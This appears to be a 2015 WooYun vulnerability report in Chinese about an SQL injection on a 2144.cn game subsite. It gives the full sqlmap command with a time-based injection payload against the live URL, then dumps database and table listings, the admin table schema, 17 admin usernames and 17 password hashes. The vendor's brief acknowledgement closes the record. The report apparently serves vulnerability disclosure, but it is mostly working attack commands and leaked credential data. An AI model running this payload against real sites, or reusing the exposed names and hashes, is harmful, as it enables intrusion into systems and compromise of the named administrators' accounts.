当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0149618

漏洞标题:2144游戏网分站SQL注射/admin+weixin+user等敏感表段爆炸

相关厂商:2144.cn

漏洞作者: 冷白开。

提交时间:2015-10-27 10:46

修复时间:2015-12-11 11:02

公开时间:2015-12-11 11:02

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-27: 细节已通知厂商并且等待厂商处理中
2015-10-27: 厂商已经确认,细节仅向厂商公开
2015-11-06: 细节向核心白帽子及相关领域专家公开
2015-11-16: 细节向普通白帽子公开
2015-11-26: 细节向实习白帽子公开
2015-12-11: 细节向公众公开

简要描述:

2144游戏网分站SQL注射/admin+weixin+user等敏感表段爆炸

详细说明:

sqlmap.py -u "http://rxxy.2144.cn/m/list?taxonomy_id=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/" --dbs

1.png

available databases [3]:
[*] information_schema
[*] sj_2144_cn
[*] test
Database: sj_2144_cn
[58 tables]
+--------------------+
| admin |
| article |
| attach |
| category |
| channel |
| collect_gl |
| collection |
| collection_data |
| config |
| coupon |
| coupon_code |
| data |
| data_category |
| data_info |
| editer |
| evaluation |
| feedback |
| friend_link |
| game |
| game_evaluation |
| game_flash |
| game_gl |
| game_news |
| game_shot |
| game_tg |
| game_tg_id |
| game_video |
| gl |
| gl_point |
| h5_category |
| html5 |
| jiong_game |
| jiong_game_reward |
| jump_url |
| keywords_link |
| news |
| prefecture |
| qr_event_log |
| recommend |
| rxxy_coupon |
| sjzs_event_log |
| sjzs_log |
| sort |
| special |
| special_category |
| special_tag |
| sy_coupon |
| sy_weixin |
| tag |
| taxonomy |
| user_coupon |
| video |
| video_tag |
| weixin_activity |
| weixin_game |
| weixin_h5_friends |
| weixin_h5rank_info |
| weixin_users |
+--------------------+
Database: sj_2144_cn
Table: admin
[11 columns]
+-------------+------------------+
| Column | Type |
+-------------+------------------+
| create_id | int(10) unsigned |
| create_time | datetime |
| data | text |
| id | int(10) unsigned |
| latest_ip | varchar(16) |
| latest_time | datetime |
| login_times | int(10) unsigned |
| name | varchar(128) |
| nick | varchar(128) |
| pwd | char(32) |
| salt | char(32) |
+-------------+------------------+
Database: sj_2144_cn
Table: admin
[17 entries]
+---------------+
| name |
+---------------+
| baoming |
| caijiannan |
| chenyu |
| fangzheng |
| huangsonghe |
| jeaoo |
| liangzhixue |
| ray |
| shenjiamei |
| sunweizheng |
| taoruanliang |
| wanyangyang |
| yanggan |
| zhoubiyun |
| zhoujian |
| zhuangyuanlan |
| zhuzhenyu |
+---------------+
Database: sj_2144_cn
Table: admin
[17 entries]
+----------------------------------+
| pwd |
+----------------------------------+
| 03e0e45c5843d52dcd46e58bfe618944 |
| 123af236bf3dd7279c77c5eca630b14e |
| 24a8171ea31b86e20ab4bfd1b00cd4e8 |
| 24d81fcd4d80bd046efe3fe7ffa47702 |
| 3213993e33a1120593f654ccb85c47cf |
| 4308cfd89b6ca553c39222fc089c282e |
| 6034f346059701df7681a8b5058d9b6d |
| 9a9683a89d92a156c6dddf4897d8e023 |
| a67eccad0545a889efd4f65d5781bc56 |
| a987a38ed3fa6e9cab37fd1b5986a2c8 |
| ad1ceff1d0a320b3faee5b90f5184c02 |
| b4e9b9520afaff1845857131f68a2d87 |
| d2aa4b3c37e102cb4f71fdb17454727e |
| d89a0feac7ffbfa4eca7d71c7d11cd03 |
| dd30e216b5b43ed7e630fd29002ab274 |
| f5d858f6b5bc3e5d6db09f9389ca756e |
| fba359af6c822d15fe913174fdfa9bb6 |
+----------------------------------+

加密太刁,老夫没一毛钱,解不了。。。哦呵呵呵呵呵呵呵

漏洞证明:

综上

修复方案:

你们懂

版权声明:转载请注明来源 冷白开。@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-10-27 11:00

厂商回复:

非常感谢您对2144安全工作的支持。

最新状态:

暂无